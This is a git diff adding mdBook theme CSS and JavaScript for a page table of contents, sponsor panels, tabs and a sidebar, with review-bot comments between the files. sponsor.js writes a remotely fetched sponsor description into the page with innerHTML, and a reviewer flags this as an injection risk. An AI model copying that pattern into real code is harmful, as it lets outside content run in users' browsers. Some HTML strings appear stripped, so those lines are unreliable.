transition-property: all; + transition-timing-function: cubic-bezier(.4,0,.2,1); + transition-duration: .3s; + } + /* .mobilesponsor:hover .mobilesponsor-description{ + display:block; + } */ + .mobilesponsor .mobilesponsor-cta{ + margin-top: auto; + margin-bottom: 10px; + margin-left: 20px; + margin-right: 20px; + text-align: center; + padding: 7px; + border-radius: 8px; + background-color: var(--fg); + color: var(--bg); + } +} + +@media only screen and (min-width:1440px) { + main { + position: relative; + } + .sidetoc { + width: 250px; + margin-top: 25px; + } + .sidetoc-wrapper { + position: fixed; + width: 250px; + height: calc(100vh - var(--menu-bar-height) - 25px * 2); + overflow: auto; + display: flex; + flex-direction: column; + gap:20px; + } + .pagetoc { + max-height: 60%; + overflow: auto; + border-left: 1px solid var(--table-border-color); + } + .sidesponsor { + max-height: 40%; + height: 40%; + background-color: var(--bg); + border: 1px solid 
var(--table-border-color); + border-radius: 8px; + padding: 5px; + display: none; /*changed via JS once ad is loaded*/ + flex-direction: column; + text-decoration: none !important; + } + .sidesponsor img { + height: auto; + width: 60%; + padding: 10px; + transition-property: all; + transition-timing-function: cubic-bezier(.4,0,.2,1); + transition-duration: .3s; + } + .sidesponsor:hover img{ + width: 30%; + } + .sidesponsor .sponsor-title{ + margin-top: 5px; + margin-bottom: 5px; + margin-left: 15px; + margin-right: 15px; + font-weight: 800; + font-size: 2rem; + color: var(--sponsor-fg); + } + .sidesponsor .sponsor-description{ + display:none; + margin-top: 5px; + margin-bottom: 15px; + margin-left: 15px; + margin-right: 15px; + color: var(--sponsor-fg); + transition-property: all; + transition-timing-function: cubic-bezier(.4,0,.2,1); + transition-duration: .3s; + overflow: scroll; + } + .sidesponsor:hover .sponsor-description{ + display:block; + + } + .sidesponsor .sponsor-cta{ + margin-top: auto; + margin-bottom: 10px; + margin-left: 20px; + margin-right: 20px; + text-align: center; + padding: 7px; + border-radius: 8px; + background-color: var(--fg); + color: var(--bg); + } + .mobilesponsor-wrapper { + display: none !important; + } + + .pagetoc a { + border-left: 1px solid var(--sidebar-bg); + color: var(--fg) !important; + display: block; + padding-bottom: 5px; + padding-top: 5px; + padding-left: 10px; + padding-right: 10px; + text-align: left; + text-decoration: none; + text-overflow: ellipsis; + line-clamp: 2; + -webkit-line-clamp: 2; + -webkit-box-orient: vertical; + overflow: hidden; + } + .pagetoc a:hover { + background: var(--sidebar-bg-hover); + color: var(--sidebar-active) !important; + border-radius: 5px; + } + .pagetoc a.active { + background: var(--sidebar-bg-hover); + color: var(--sidebar-active) !important; + border-radius: 5px; + } + .pagetoc .pagetoc-H2 { + padding-left: 20px; + } + .pagetoc .pagetoc-H3 { + padding-left: 40px; + } + .pagetoc 
.pagetoc-H4 { + padding-left: 60px; + } + .pagetoc .pagetoc-H5 { + display: none; + } + .pagetoc .pagetoc-H6 { + display: none; + } +} diff --git a/theme/pagetoc.js b/theme/pagetoc.js new file mode 100644 index 000000000..5962db9f3 --- /dev/null +++ b/theme/pagetoc.js @@ -0,0 +1,68 @@ +let scrollTimeout; + +const listenActive = () => { + const elems = document.querySelector(".pagetoc").children; + [...elems].forEach(el => { + el.addEventListener("click", (event) => { + clearTimeout(scrollTimeout); + [...elems].forEach(el => el.classList.remove("active")); + el.classList.add("active"); + // Prevent scroll updates for a short period + scrollTimeout = setTimeout(() => { + scrollTimeout = null; + }, 100); // Adjust timing as needed + }); + }); +}; + +const getPagetoc = () => document.querySelector(".pagetoc") || autoCreatePagetoc(); + +const autoCreatePagetoc = () => { + const main = document.querySelector("#content > main"); + const content = Object.assign(document.createElement("div"), { + className: "content-wrap" + }); + content.append(...main.childNodes); + main.prepend(content); + main.insertAdjacentHTML("afterbegin", '
'); + return document.querySelector(".pagetoc"); +}; +const updateFunction = () => { + if (scrollTimeout) return; // Skip updates if within the cooldown period from a click + const headers = [...document.getElementsByClassName("header")]; + const scrolledY = window.scrollY; + let lastHeader = null; + + // Find the last header that is above the current scroll position + for (let i = headers.length - 1; i >= 0; i--) { + if (scrolledY >= headers[i].offsetTop) { + lastHeader = headers[i]; + break; + } + } + + const pagetocLinks = [...document.querySelector(".pagetoc").children]; + pagetocLinks.forEach(link => link.classList.remove("active")); + + if (lastHeader) { + const activeLink = pagetocLinks.find(link => lastHeader.href === link.href); + if (activeLink) activeLink.classList.add("active"); + } +}; + +window.addEventListener('load', () => { + const pagetoc = getPagetoc(); + const headers = [...document.getElementsByClassName("header")]; + headers.forEach(header => { + const link = Object.assign(document.createElement("a"), { + textContent: header.text, + href: header.href, + className: `pagetoc-${header.parentElement.tagName}` + }); + pagetoc.appendChild(link); + }); + updateFunction(); + listenActive(); + window.addEventListener("scroll", updateFunction); +}); + diff --git a/theme/sponsor.js b/theme/sponsor.js new file mode 100644 index 000000000..4875d91f8 --- /dev/null +++ b/theme/sponsor.js 
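Review bot: `updateFunction` re-queries `getElementsByClassName("header")` and the `.pagetoc` children on every `scroll` event, although both lists are already built once in the `load` handler; computing `headers` and `pagetocLinks` there and closing over them keeps the scroll path to a single loop. `autoCreatePagetoc` dereferences `document.querySelector("#content > main")` without a null check, so a page without that element throws inside `load` before any listener is attached. The click cooldown stores a timer id in `scrollTimeout` and `updateFunction` then reads it as a boolean, which works but would read more clearly as a dedicated flag.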
@@ -0,0 +1,58 @@ +;(function sponsor() { + var sponsorSide = document.querySelector(".sidesponsor") + var sponsorImg = sponsorSide.querySelector(".sidesponsor img") + var sponsorTitle = sponsorSide.querySelector(".sponsor-title") + var sponsorDescription = sponsorSide.querySelector(".sponsor-description") + var sponsorCTA = sponsorSide.querySelector(".sponsor-cta") + var mobilesponsorSide = document.querySelector(".mobilesponsor") + var mobilesponsorImg = mobilesponsorSide.querySelector(".mobilesponsor img") + var mobilesponsorTitle = mobilesponsorSide.querySelector( + ".mobilesponsor-title" + ) + var mobilesponsorDescription = mobilesponsorSide.querySelector( + ".mobilesponsor-description" + ) + var mobilesponsorCTA = mobilesponsorSide.querySelector(".mobilesponsor-cta") + + async function getSponsor() { + const url = "https://cloud.hacktricks.wiki/sponsor" + try { + const response = await fetch(url, { method: "GET" }) + if (!response.ok) { + console.log(response) + throw new Error(`Response status: ${response.status}`) + } + + const json = await response.json() + var sponsor = json.sponsor + console.log("boop", sponsor) + sponsorImg.src = sponsor.image_url + sponsorTitle.textContent = sponsor.name + sponsorDescription.innerHTML = sponsor.description + sponsorSide.href = sponsor.link + sponsorCTA.textContent = sponsor.cta + sponsorSide.style.display = "flex" + + mobilesponsorImg.src = sponsor.image_url + mobilesponsorTitle.textContent = sponsor.name + mobilesponsorDescription.innerHTML = sponsor.description + mobilesponsorSide.href = sponsor.link + mobilesponsorCTA.textContent = sponsor.cta + mobilesponsorSide.style.display = "flex" + + if (sponsor.name.length > 45) { + sponsorTitle.style.fontSize = "1.6rem" + mobilesponsorTitle.style.fontSize = "1.6rem" + } + + if (sponsor.description.length > 250) { + sponsorDescription.style.fontSize = "1.4rem" + mobilesponsorDescription.style.fontSize = "1.4rem" + } + } catch (error) { + console.error(error.message) + } + } + 
+ getSponsor() +})() diff --git a/theme/tabs.css b/theme/tabs.css new file mode 100644 index 000000000..07a4dec9d --- /dev/null +++ b/theme/tabs.css @@ -0,0 +1,41 @@ +.mdbook-tabs-container{ + background-color: var(--bg); + border: 1px solid var(--table-border-color); + border-radius: 8px; +} + +.mdbook-tabs { + display: flex; + margin-top: 0 !important; +} + +.mdbook-tab { + background-color: var(--bg); + padding: 0.5rem 1rem; + cursor: pointer; + border: none; + font-size: 1.6rem; + line-height: 1.45em; + color: var(--icons-hover); +} + +.mdbook-tab:hover { + color: var(--icons); +} + +.mdbook-tab.active { + background-color: var(--theme-hover); + color: var(--icons); +} + +.mdbook-tab-content { + padding: 1.2rem; +} + +.mdbook-tab-content table { + margin: unset; +} + +.mdbook-tab-content pre { + margin: unset; +} diff --git a/theme/tabs.js b/theme/tabs.js new file mode 100644 index 000000000..8ba5e878c --- /dev/null +++ b/theme/tabs.js 
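Review bot: `sponsorDescription.innerHTML = sponsor.description` and the matching `mobilesponsorDescription.innerHTML` assignment render a string from the remote `https://cloud.hacktricks.wiki/sponsor` response as HTML on every page, so the content of that endpoint (or a tampered response) decides what runs on the site's origin; the other fields already use `textContent`, so `sponsorDescription.textContent = sponsor.description` and `mobilesponsorDescription.textContent = sponsor.description` are the consistent fix, with a sanitizer only if formatted descriptions are genuinely required. `sponsor.link` is assigned straight to `href`; checking that `new URL(sponsor.link).protocol` is `http:` or `https:` before using it avoids rendering a non-web scheme as a clickable sponsor link. The `console.log("boop", sponsor)` and `console.log(response)` calls look like leftover debugging. The top-level `querySelector` results are also dereferenced without a null check, so a page lacking `.sidesponsor` or `.mobilesponsor` throws before `getSponsor` runs.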
@@ -0,0 +1,75 @@
+/**
+ * Change active tab of tabs.
+ *
+ * @param {Element} container
+ * @param {string} name
+ */
+const changeTab = (container, name) => {
+ for (const child of container.children) {
+ if (!(child instanceof HTMLElement)) {
+ continue;
+ }
+
+ if (child.classList.contains('mdbook-tabs')) {
+ for (const tab of child.children) {
+ if (!(tab instanceof HTMLElement)) {
+ continue;
+ }
+
+ if (tab.dataset.tabname === name) {
+ tab.classList.add('active');
+ } else {
+ tab.classList.remove('active');
+ }
+ }
+ } else if (child.classList.contains('mdbook-tab-content')) {
+ if (child.dataset.tabname === name) {
+ child.classList.remove('hidden');
+ } else {
+ child.classList.add('hidden');
+ }
+ }
+ }
+};
+
+document.addEventListener('DOMContentLoaded', () => {
+ const tabs = document.querySelectorAll('.mdbook-tab');
+ for (const tab of tabs) {
+ tab.addEventListener('click', () => {
+ if (!(tab instanceof HTMLElement)) {
+ return;
+ }
+
+ if (!tab.parentElement || !tab.parentElement.parentElement) {
+ return;
+ }
+
+ const container = tab.parentElement.parentElement;
+ const name = tab.dataset.tabname;
+ const global = container.dataset.tabglobal;
+
+ changeTab(container, name);
+
+ if (global) {
+ localStorage.setItem(`mdbook-tabs-${global}`, name);
+
+ const globalContainers = document.querySelectorAll(
+ `.mdbook-tabs-container[data-tabglobal="${global}"]`
+ );
+ for (const globalContainer of globalContainers) {
+ changeTab(globalContainer, name);
+ }
+ }
+ });
+ }
+
+ const containers = document.querySelectorAll('.mdbook-tabs-container[data-tabglobal]');
+ for (const container of containers) {
+ const global = container.dataset.tabglobal;
+
+ const name = localStorage.getItem(`mdbook-tabs-${global}`);
+ if (name && document.querySelector(`.mdbook-tab[data-tabname=${name}]`)) {
+ changeTab(container, name);
+ }
+ }
+});
diff --git a/theme/toc.js.hbs b/theme/toc.js.hbs
new file mode 100644
index 000000000..5bc3c97a3
--- /dev/null
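Review bot: In the restore loop at the end of the DOMContentLoaded handler, `document.querySelector(\`.mdbook-tab[data-tabname=${name}]\`)` interpolates a value read back from localStorage into a CSS selector unquoted and unescaped; a stored value containing a space, quote or bracket (stale data, or anything another same-origin script wrote under that key) makes querySelector throw a SyntaxError, which aborts the handler before the remaining containers are restored. Quote and escape the interpolated value, `` `.mdbook-tab[data-tabname="${CSS.escape(name)}"]` ``, and apply the same `CSS.escape(global)` to the `[data-tabglobal="${global}"]` selector in the click handler, which is quoted but not escaped. The click handler also writes `name` without checking it: a tab missing `data-tabname` yields `undefined`, which `localStorage.setItem` stores as the string "undefined", so guarding with `if (!name) return;` before `changeTab(container, name)` avoids persisting a bogus selection.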
+++ b/theme/toc.js.hbs @@ -0,0 +1,73 @@ +// Populate the sidebar +// +// This is a script, and not included directly in the page, to control the total size of the book. +// The TOC contains an entry for each page, so if each page includes a copy of the TOC, +// the total size of the page becomes O(n**2). +class MDBookSidebarScrollbox extends HTMLElement { + constructor() { + super(); + } + connectedCallback() { + // Modify TOC to support external links + var toc = '{{#toc}}{{/toc}}'; + toc = toc.replace(/
([^$<>]*)\$\$external:([^$<>]*)\$\$<\/div>/g, '$1') + this.innerHTML = toc + // Set the current, active page, and reveal it if it's hidden + let current_page = document.location.href.toString(); + if (current_page.endsWith("/")) { + current_page += "index.html"; + } + var links = Array.prototype.slice.call(this.querySelectorAll("a")); + var l = links.length; + for (var i = 0; i < l; ++i) { + var link = links[i]; + var href = link.getAttribute("href"); + if (href && !href.startsWith("#") && !/^(?:[a-z+]+:)?\/\//.test(href)) { + link.href = path_to_root + href; + } + // The "index" page is supposed to alias the first chapter in the book. + if (link.href === current_page || (i === 0 && path_to_root === "" && current_page.endsWith("/index.html"))) { + link.classList.add("active"); + var parent = link.parentElement; + if (parent && parent.classList.contains("chapter-item")) { + parent.classList.add("expanded"); + } + while (parent) { + if (parent.tagName === "LI" && parent.previousElementSibling) { + if (parent.previousElementSibling.classList.contains("chapter-item")) { + parent.previousElementSibling.classList.add("expanded"); + } + } + parent = parent.parentElement; + } + } + } + // Track and set sidebar scroll position + this.addEventListener('click', function(e) { + if (e.target.tagName === 'A') { + sessionStorage.setItem('sidebar-scroll', this.scrollTop); + } + }, { passive: true }); + var sidebarScrollTop = sessionStorage.getItem('sidebar-scroll'); + sessionStorage.removeItem('sidebar-scroll'); + if (sidebarScrollTop) { + // preserve sidebar scroll position when navigating via links within sidebar + this.scrollTop = sidebarScrollTop; + } else { + // scroll sidebar to current active section when navigating via "next/previous chapter" buttons + var activeSection = document.querySelector('#sidebar .active'); + if (activeSection) { + activeSection.scrollIntoView({ block: 'center' }); + } + } + // Toggle buttons + var sidebarAnchorToggles = 
document.querySelectorAll('#sidebar a.toggle'); + function toggleSection(ev) { + ev.currentTarget.parentElement.classList.toggle('expanded'); + } + Array.from(sidebarAnchorToggles).forEach(function (el) { + el.addEventListener('click', toggleSection); + }); + } +} +window.customElements.define("mdbook-sidebar-scrollbox", MDBookSidebarScrollbox); \ No newline at end of file